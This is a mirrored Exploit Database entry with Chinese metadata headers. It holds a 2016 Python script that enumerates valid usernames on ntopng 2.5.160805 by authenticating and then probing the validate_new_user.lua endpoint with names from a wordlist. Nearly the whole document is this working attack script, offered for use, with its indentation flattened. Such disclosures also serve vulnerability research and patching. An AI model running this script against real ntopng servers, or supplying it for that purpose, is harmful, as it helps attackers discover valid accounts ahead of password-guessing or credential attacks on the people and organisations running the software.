ntop-ng 2.5.160805 – Username Enumeration

• Exploit Database
• 16 阅读

• 作者： Dolev Farhi
  日期： 2016-08-04
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/40942/

• # Exploit title: ntopng user enumeration
  # Author: Dolev Farhi
  # Contact: dolevf at protonmail.com
  # Date: 04-08-2016
  # Vendor homepage: ntop.org
  # Software version: v.2.5.160805
  
  #!/usr/env/python
  import os
  import sys
  import urllib
  import urllib2
  import cookielib
  
  server = 'ip.add.re.ss'
  username = 'ntopng-user'
  password = 'ntopng-password'
  timeout = 6
  
  if len(sys.argv) < 2:
  print("usage: %s <usernames file>") % sys.argv[0]
  sys.exit(1)
  
  if not os.path.isfile(sys.argv[1]):
  print("%s doesn't exist") % sys.argv[1]
  sys.exit(1)
  
  try:
  cj = cookielib.CookieJar()
  opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  login_data = urllib.urlencode({'user' : username, 'password' :
  password, 'referer' : '/authorize.html'})
  opener.open('http://' + server + ':3000/authorize.html', login_data,
  timeout=timeout)
  print("\nEnumerating ntopng...\n")
  with open(sys.argv[1]) as f:
  for user in f:
  user = user.strip()
  url = 'http://%s:3000/lua/admin/validate_new_user.lua?user=%s&netw
  orks=0.0.0.0/0,::/0' % (server, user)
  resp = opener.open(url)
  if "existing" not in resp.read():
  print "[NOT FOUND] %s" % user
  else:
  print "[FOUND] %s" % user
  except Exception as e:
  print e
  sys.exit(1)